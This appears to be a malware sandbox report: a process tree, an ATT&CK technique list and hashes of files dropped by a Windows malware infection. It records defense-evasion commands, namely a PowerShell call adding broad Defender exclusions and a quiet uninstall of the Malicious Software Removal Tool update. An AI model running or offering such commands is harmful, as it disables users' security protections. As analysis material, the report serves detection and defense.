- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:3180
- - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    3⤵
    PID:5004

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2100

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1248
- C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
  C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
  2⤵
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1628
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2299758,0x7fef2299768,0x7fef2299778
    3⤵
    PID:1940
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1060 --field-trial-handle=1304,i,14019268884419613503,17651908482015968348,131072 /prefetch:2
    3⤵
    PID:936
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1424 --field-trial-handle=1304,i,14019268884419613503,17651908482015968348,131072 /prefetch:8
    3⤵
    PID:2404
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1496 --field-trial-handle=1304,i,14019268884419613503,17651908482015968348,131072 /prefetch:8
    3⤵
    PID:2440
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2040 --field-trial-handle=1304,i,14019268884419613503,17651908482015968348,131072 /prefetch:1
    3⤵
    PID:1664
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2060 --field-trial-handle=1304,i,14019268884419613503,17651908482015968348,131072 /prefetch:1
    3⤵
    PID:2364
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2292 --field-trial-handle=1304,i,14019268884419613503,17651908482015968348,131072 /prefetch:2
    3⤵
    PID:2544

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /4
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2880
- C:\Windows\SysWOW64\taskmgr.exe
  C:\Windows\system32\taskmgr.exe /4
  2⤵
  PID:2960

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~2\797E~1\INST77~1.EXE"
1⤵
PID:2156
- C:\PROGRA~2\797E~1\INST77~1.EXE
  C:\PROGRA~2\797E~1\INST77~1.EXE
  2⤵
  PID:752

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2684

C:\Windows\system32\taskeng.exe
taskeng.exe {6A442DA3-59A2-4ECB-8CD2-0296A35D82E2} S-1-5-21-406356229-2805545415-1236085040-1000:IKJSPGIM\Admin:Interactive:[1]
1⤵
PID:2420
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:380
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1"
    3⤵
    PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1
      C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1
      4⤵
      PID:3216
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:1960
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1"
    3⤵
    PID:3736

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
1⤵
PID:5060
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4888
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3488
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3208
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:1388

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:1908
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3240
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:4520

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240310153145.log C:\Windows\Logs\CBS\CbsPersist_20240310153145.cab
1⤵
PID:4972

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

Impair Defenses

Modify Registry

Scripting

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\inst77player.exe

Filesize
431KB

MD5
62383df45e21d63ade58edd0e4aad4fa

SHA1
b116602ae29c0f2bd87f785694fab20791be6362

SHA256
f70944c7906d938c143b66f8c943f60daba949c956fef8898f55d37aafdfd88e

SHA512
ca9f8a37a74bffa628a0c3791cd9cdbb463c8b47bfe260da857a4b497d6b67411bad1c630d450804b86a50043800d839f3a162f4b464eeed8ad48e123a9e3343

Download Submit
C:\ProgramData\{8BD1D40C-BFF1-CB1F-2ABC-844EDC710E31}\266e0493.exe

Filesize
576KB

MD5
6071162642b20b753aa0453beac9f2c8

SHA1
f3273a79468202037b5748116268a374b4caa2a1

SHA256
f2861c4e233f053002899cf60d8070b257bc984c049aaee8bb734a3b9d20b4eb

SHA512
329c00654671f6a69d0ca00f692b80fb311c56e741076e880015398e9f001b0388f9d1757e8f1873ca715d1fe1aaa5230578fb3050a4e8572a84796b903068f4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2a682fe610eabe8f86058e18952f8ef1

SHA1
8d5ce34361ee5c7f4025df589d6d8f3a67304eab

SHA256
bee030eae5bc78e7b016a6f4485d90467c3a8b952275232939f5f2f19a95b70a

SHA512
6be30a0da4ea31ba204d634d22fbc6bb85454438a003316b2019033fbce73a0c635381e4ac075111dd2626fd4007858f067cc8284404e53735b9157b91dfefb1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\3a6db4a5-5746-4cf9-ac20-c22cf67446e9.tmp

Filesize
258KB

MD5
a12da16d7d84a9b51f31ba7ad826bd80

SHA1
be24d57dd3bd620d3eec96b459defd7ed9dabcce

SHA256
326e7cf3d41430676b64d27189f1486a57a113e77d2e818d7ad3f58d089fe806

SHA512
7c7089a981df0ec7c39f4271f3a6251dd03578e473b3bb867191d1cc30e79c34f24b1fdad86ea4f335ab7a4965344e2c13d433a08a87853265a0b7ddb5d69ac8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
e718426ee9be2b04f289fdf76d7303a8

SHA1
71f1a5822d92a9fb97eabec7111c4000a439b5c3

SHA256
a8ea5fa788a1273d39af88319d29c41e47ad2db4b5298f9be71d3e38699d48ea

SHA512
729140619b34af6936cb6cec14851c4f14308be17da926b0953e7ae6ca96a01ba7ef32361c71a9c8cf8f6685d63f1e710c035be440bae9b5710346d4d31575ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
258KB

MD5
9b36005e88df74cb4f71260853beea0b

SHA1
e97bb05cd1ea5f880ca44f0d329f00addddce914

SHA256
3a3fdd100e2d3276aa79d6ed2028c4aaee71fbb0468df6862d07bdd53b6b56f0

SHA512
c5fecdacafc4a7292e65c16faa2a5d5f6c7d6a33d9949fb0dab30874154b5e8e12795456eb1ec8362fdf4a08cc1e13f10bb703978894d7956b345e4dbbb3d105

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PU2MMJX7\plaza[1].exe

Filesize
640KB

MD5
247436328d4e74627ccc1aa586e3fa56

SHA1
ba7bf5de3368d58e56e6d4398def34efc7c922fc

SHA256
5f7519abdf04cd6ca30c7294309e4b4e4226ab35f17890c080d9b42e64636d9d

SHA512
2125baffb973e200edeeeefcfdb33266cb172cb0f1c7783561feaec476c789fc9114c959afbaefaac6d208c473ffafe173fefa6a51dfd1651237b410667630d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

Filesize
505KB

MD5
f732ecaf0d96b787a2c8a1f09e0a6433

SHA1
b6c891183ba8e76ac129ac3d142c1c038c3cb717

SHA256
28eb10daa88be319deeb27e4ff8235befbf3e294093c77d2799cf119942ab907

SHA512
a3a5b679ee0eeccf9b14b8ca64b73d448110a65d3bacb26dd50852b69e4b654ee083c22c87b167a59c30cfd8e8445a9646cfd6384299bdef5a2a40ba3141d4d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1090629303.exe

Filesize
84KB

MD5
41d55c23d79fc0c0c322db16c6ce6af8

SHA1
e4bbdf2a983a11975a7ab6dcba41cb60676ec780

SHA256
93f3f99a6d6dc69b907a3da8596bd850c1e3ce53be9bf1c6edfdb00e90579e6f

SHA512
06680eb47802659dc2e28cd9a839052a8536112056db49f7179f1b53cf2dba0e9cfd9d8bbdeb446ecb8a2f4a58f7b0f100d0526660d4afd8540a4db091cf621f

Download Submit
C:\Users\Admin\AppData\Local\Temp\260421327.exe

Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
C:\Users\Admin\AppData\Local\Temp\2b54f0a5

Filesize
7.5MB

MD5
cbcf4f70cecf0195a40b2e3914bc96b2

SHA1
32a89ab4403762f7f3fe7606df33e1bf83d4113b

SHA256
46560508bbe7187cb4605ce8e1b080583176f43d24b28e2a6d93fea503749bbf

SHA512
d611526a881ed19d15df0e0f70ce3d3fafe1350a8849ef6fc55ebb3eb75557fd828781c6bcbd090fdba2ef3e3e934c65f4b33430cfd64fc30c3e15fd1125e62d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\.exe

Filesize
256KB

MD5
bb398fe88da91528938380fcb90e4564

SHA1
5b667cbb8ab54cc004263ec8ebac60b0f8484480

SHA256
10a3aac04353f6f2096f02052aa5105b4474f13896a7718fa8c001b059a4f2b9

SHA512
ae760146741ae11a27865abd17feb1423ddce89bd0e034c697060965986b70c498b245ac670816599da885d101006e70d94d2d003d1e641cad207e83f5f7e54a

Download Submit
C:\Users\Admin\AppData\Local\Temp\9aoo6eyj.dll

Filesize
3KB

MD5
870407f773d692afb96262f751a378d7

SHA1
4f57ee5fec1f289ee756902ec15ea26fee16a92f

SHA256
2bcd751bd7f83f199e331659e29b2e2940ac01eebcaa426398450b5b8cef6d01

SHA512
536e73d4abef1e9c78433dc2a620b0864b651b55aac18449026ba53dd1938a87bf91c566505fd4552d2503109b4248758b6507cc5be9a61b554e041d58141bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\9aoo6eyj.pdb

Filesize
11KB

MD5
c96b8d84ccf9644c19a3573fa30598db

SHA1
9ab3179fb448b6ef231b22b89353c9191805259c

SHA256
1238abc0d8583d543dbf4c1297a3965f521193bed3318b3200ff755954c13a75

SHA512
c5d2937fba74996901fa653400819ff9ee51de7f694e76881616dce37fb5a44bdfd7948eb5cb58b10879e930137c3b352dbfcc02e81345456bf6a8002698da93

Download Submit
C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe

Filesize
228KB

MD5
ae7ec3a871852825d682dcef86c0e264

SHA1
dce5028ffb3ff806d27d1dc5613c1d4558a6985d

SHA256
2a56e7d42ba9e924540a2f4d6c233ce7f93b6437ea39291c58bfbe92dec1d476

SHA512
7a6bd4a2619123a8835c7d13bac804e8fadc227100e59309ecb1bf54f9150085b9c7227a48f803cbbf2358548da353c653b1396fa09fc2ebd773ba307b4541bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe

Filesize
76KB

MD5
f9bd179e7158ffa12e8ea92b8a7edacf

SHA1
a9088ec6a5220d8dc2bba454ce5ed5cea66173d8

SHA256
1a301b806408563449a4830c3a0d6d2761d98c86805d75a91672c717c2776b36

SHA512
b5dc5f1a4168ed7bdc580d6f9ea930a1dc44377af31ad82c2ba6dd8b4964152cb66b21851190555fef8eeaf4e9f6911faf74dbaf37b5508c5dfc2816b39e6d0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe

Filesize
233KB

MD5
8dc8b9bc6ba7d44f34e72d1ad1cd0ee1

SHA1
520727afb5bbb90046d8ecb252f56ec6a6bebd84

SHA256
8a05c6fb79b07c99af406d3a084fe0db6a8664cde9bf034e499e71c81422ce02

SHA512
91ff30560432f04682d08acc8620e8511a4b67bcae25e1ed393c3b178931a02be2634266b9670f8a9166344fc05068163e727f87cfe670ff77cfc48e2dadc0dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\AITMP0\ailogo.ico

Filesize
21KB

MD5
044f9f53d150bdab3e7a7b5727181102

SHA1
c95c7c1a003eeff2c1b7222eca73cecea6ead949

SHA256
3342a6ed58e4e6fe6566c3f379346ac96fbb5819446d67bb4b88b67729f3772f

SHA512
369f999acc2c45ac784b7396a1287b9aedd02036e87b6397e01d23be9a5b5711578b9d07a65690e8aef2d081ef5cbd463f32ba6ed4f2ec692afd9c93c6b560ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe

Filesize
397KB

MD5
6f593dbea0a8703af52bd66f582251a4

SHA1
2201a210e9680ec079b08bdb1da6d23112d87dcc

SHA256
a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336

SHA512
97ebc0b7f27a76efead93fce05a8d059b4c6629e6348d5d4b728ed910ab00848b44737c6b5a48ac070d62a1da9273fc72b809fcf36bd17afb573fccc33d5aa73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXE

Filesize
640KB

MD5
04c7c795e01d97fcc8a8ccd294e3f045

SHA1
408e254653b6ed13ebb72820429b72ff23c22858

SHA256
7d9116063b8e4f6542e43fb90ab85e06c9bbbef5dd2b8c2f83c8c112cc7ce8da

SHA512
9f34770c6c1438761429ca4c8b28d0e48bf2cfe82ce9629c1388cc8c6fd27acea0769e1611924456db064afe12c6781679f811d6c9715cc9159a36cc8aba9d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE

Filesize
1.3MB

MD5
a7b9fb015c635cf8b9ae7ae3ef38d420

SHA1
5d700841fbe92748a1c94b614a4ed52c197ca0e8

SHA256
16249e945fcaf007b6573d44edfb904a79318c662c6200a333c48c15135eddda

SHA512
e86ff7827dec7ad35bd8bb775cf5421888874a68c7ebe7f029e2992bec36828cd841d2822bfdf1edef3f4be81ca035614b199eae9f9ac2e9b929e215a2b8e0cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXE

Filesize
832KB

MD5
085885a08b88aa7ca10630389a36cb79

SHA1
ba78a17c9b63b2aa5fd44e451a29c66f32004798

SHA256
3ef96c53e427e2e1252a0beef5e61075311fcbb5885b021f5bb78fe6673d761b

SHA512
c9431df6753b3485ea64fa0b7724a62c11b3126205cb98a611e1efcb7089f99dab05346e9416faf17b2e62a454ebe982ef0c4f30aa27e2f92394f67671e96fb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\SYNERG~1.EXE

Filesize
1.3MB

MD5
ee509e45535aee175ba5ca42ca4ba4ba

SHA1
e5d5f5c4ffa80f2c25fad569e675943f007649ae

SHA256
0088cba718243ebb3a47781992ada6af2f0d8ed12c1449fdcad97835879f4f6c

SHA512
6c55a59bb813a51cf33dc03b5e47bf3f51ae1dd0688d01c3314e48c407efc44a2cfafa506c359f1621259485174ea7226f788432295be0141761ef057c423771

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE

Filesize
512KB

MD5
2d3f8458d56984b3a64be726344db4df

SHA1
76f1f182accf2759d0206bb157b5a7c71cdc2201

SHA256
153f1eff07a06f6674a1e58f37cf1fc17a01199fb96a664af5c6d3b0dbf0ca84

SHA512
f7570638dc1906c709a41a2f6d9a79082efc45d1e520097648af3e3232faac0ecc43beed3f20d6d6af56359de3166135ca84ac86116e86190e10d9139f301834

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe

Filesize
4.3MB

MD5
dd00d5501f388f4422cce9bd559394e0

SHA1
aedb099cd36fb77bd85921dbea5f60e8fdedcb04

SHA256
cebeab296875244d1748a0ffe1c23b01f41e93cb684e03eb4ddf42b226fb97c2

SHA512
5942eb9aa7f6a116338bd0eb44becb4a2ff095821b8864ecf345d8e7fefac574b04843b70d309d81ad540f6a385592660ab16031fca0d56c97487cc0607162b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe

Filesize
2.6MB

MD5
00204a569005dd9254329bcb02045496

SHA1
599b69ba720215a3a4dc8bcf08ed3e983040bd33

SHA256
af8e96bbd067c9f7f56ef3359033399e31fc108f56575f4be6af4fea17fd6d51

SHA512
82617ba0357121eebba754d7e90f08c71c1677306e89fd7625aa3d7762d3d532c872e74b267e1154bce588a15f4bec14ca4bf9e8035d1252b226d8bb977dc37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Zenith_Hub_20240229201747443.exe

Filesize
384KB

MD5
c63f91394710b5851b388b9d1365fdab

SHA1
62dc7dc9f33f412423f11c699723047ff184f283

SHA256
fa30e8071771dc97076aab29da2ec2d0c9e900b65c732fae4b624d7e32c869e0

SHA512
a62196809e8c4a901b52f10b808fe86eff4734e0299c02e0746b86145f383533757792b694307dd5557c54ae373de337eaf5ef73fb5932a95dca2ab9f4118b72

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Zenith_Hub_20240229201747443.exe

Filesize
1.3MB

MD5
492b9cec4bab558d09bfdcff88600953

SHA1
148598f122553279552fb05f3300e3a07e3fd591

SHA256
678cb517b83dfe84399f3e91c647706cdd73baddb97ec369ea8189c795033848

SHA512
72e4d79680f85d145f4e4737673384da10a7f9417b91c5f80d1c758544b18bbd66bbe8f7fd3169aa4a7df2d4ee45e9783844c606163ff0aa231c9beb4f803b8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\loader.log

Filesize
1KB

MD5
8cb03c2ebc2ee59995a45f8f1d83461d

SHA1
62eb56f1ef07031c48524e0ba10a4d9eed7e5bde

SHA256
52dfe8f7e2a3808899fc17573abb3e5d27dc7264975ef530462af8a37c6daf0f

SHA512
e8a5c612e7bae0a29b1a0505d9afb5182cd09dbb9df49cfa836aa9f0c1037a3a494f482c9827a96c0b837f960d1fbada8f61b05e45eb8cd997a84d5a53bea4a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\loader.log

Filesize
1KB

MD5
b676dfb387afa9b5162350fff8fbad17

SHA1
c143f5a4832dc75a0b04bb7f350e84a2ea85189b

SHA256
6a0be51907551686025292dc88abc330a56bb586fd6ae613d7a992551e312e14

SHA512
27c5544a0e50a4863f10d70583abd64caf60704d466088144d960341b6c1cd362de1526ee291ce3000ed11a7972d68fd234f48068390ade247e8a50ebcd7f952

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\native.exe

Filesize
1.6MB

MD5
87fb7cb618767e4cf0dd8d50fec4ceb3

SHA1
4b2742fbebbe9f4572243bb50e360e340233f55e

SHA256
7333fcccc7424ace03acebe8ac37980531a0b87ff05a691b0673a23d51eeef1e

SHA512
d0b3473e84aeb8e75875a11bad26a58a23b484e9bb34fd7e5afce2842df91335101e7d36cb55bb281ebd5d11faf6f3789c475ead6125746d11cc1fb072eb21d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe

Filesize
42KB

MD5
470797a25a6b21d0a46f82968fd6a184

SHA1
dac7867ee642a65262e153147552befb0b45b036

SHA256
ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419

SHA512
4bf0a43c55ce86b79b87fca3bc48927f9d049c3d67131f5fb04bd9a5c56bde79a46013be8b17a5e7ac7fcc1c0c6ba24166a5627e75c2573117a7039c7724a63e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe

Filesize
9.7MB

MD5
58d28558b5e2ffbb0238ed852b0fccf4

SHA1
88ce8d1c7a152d5b1095d0ace8815c597111454e

SHA256
ab636afce7424bcbdc93485835088b2594011df6a55346cde38fb6d3423eb820

SHA512
4607a9b40e0878bc06e5bc3c925e434b31ff3d70fa3257555b3a44b51bb011cd6e6aef9eae61cc472c33b3593a54f784c999ef8df71e452ae666b85d3e57b72b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe

Filesize
282KB

MD5
e86471da9e0244d1d5e29b15fc9feb80

SHA1
5e237538eb5b5d4464751a4391302b4158e80f38

SHA256
50dd267b25062a6c94de3976d9a198a882a2b5801270492d32f0c0dadc6caa81

SHA512
d50a934923ec9133e871d797a59334ad92e0e51bcd3e3fd47f2c00510b87e69d6ac012682ac661121f6bbd0ece47872d79e4f9eae5550aae6dda3dd36bdb2088

Download Submit
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe

Filesize
1.8MB

MD5
97256cf11c9109c24fde65395fef1306

SHA1
e60278d8383912f03f25e3f92bf558e2a33f229d

SHA256
21c23083404349dbc8e7094338acaa07ea5a7e3a442bb81a528e06c175b8d934

SHA512
41e9c7911c1f461ec389ac9d430898bd9e21accf6b4291d30c4e743084bb19c2ae9279597f4a43cfaec621263cb135c3ada21e23e27cc7961c794fa499910c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES868F.tmp

Filesize
1KB

MD5
61936fc02bed9e2f3c72911db1d0837e

SHA1
de71795f55f589200b44fb0b6da1d437466f0bad

SHA256
5bf80eb315d8ebcec30d2b1dfc4b7dbac46cb3cd21ed1e1d83417ae328bb20ed

SHA512
89932cbfe1ecf4787c41897db3f90048f235dfab97eb922ee10dbb59fb2943fd7260928630c95c8e33af546b4f28f43509038862157f4b8ad7dc68c6d1b8bc4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar60CD.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\heidiJ4FeOlHkrixM\1xVvEKQvyAxJI2d51HLG.exe

Filesize
832KB

MD5
b44eff2b9d49e94e6da4e19b6c59e76f

SHA1
7317a506554c47d9fdd0f0246bb907e8b1786234

SHA256
e851798ab6c0e829e4c4466bc45e25617fd6563ac3890920786a9cc02a3ecf48

SHA512
d178bf9d632202ae72654241a11ab808cc5853c9f0221765a0a7a6b67c44d1917ccadda409a9c6c2080f878ea8c80d9ffe308e92d3e0eb1bcd0f6b957b68e6fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\heidiJ4FeOlHkrixM\3b6N2Xdh3CYwplaces.sqlite

Filesize
1.6MB

MD5
5e1fe86137f134fc65dc9245f3006543

SHA1
294d1bf2de3eef497321857bf4c7fb8ff0e2f534

SHA256
8cb07310445b2808a5fb8d84c9de8b107e536f6fac391c1e6ac8b39543fa0b2e

SHA512
c5629944eb63014a0fca84815a3ca2d5a80e8f3a8f400783595151562cd2b3fd9c5950af1e554c5aae8cf571763f6040545eecc3ef365394f61da30436e206da

Download Submit
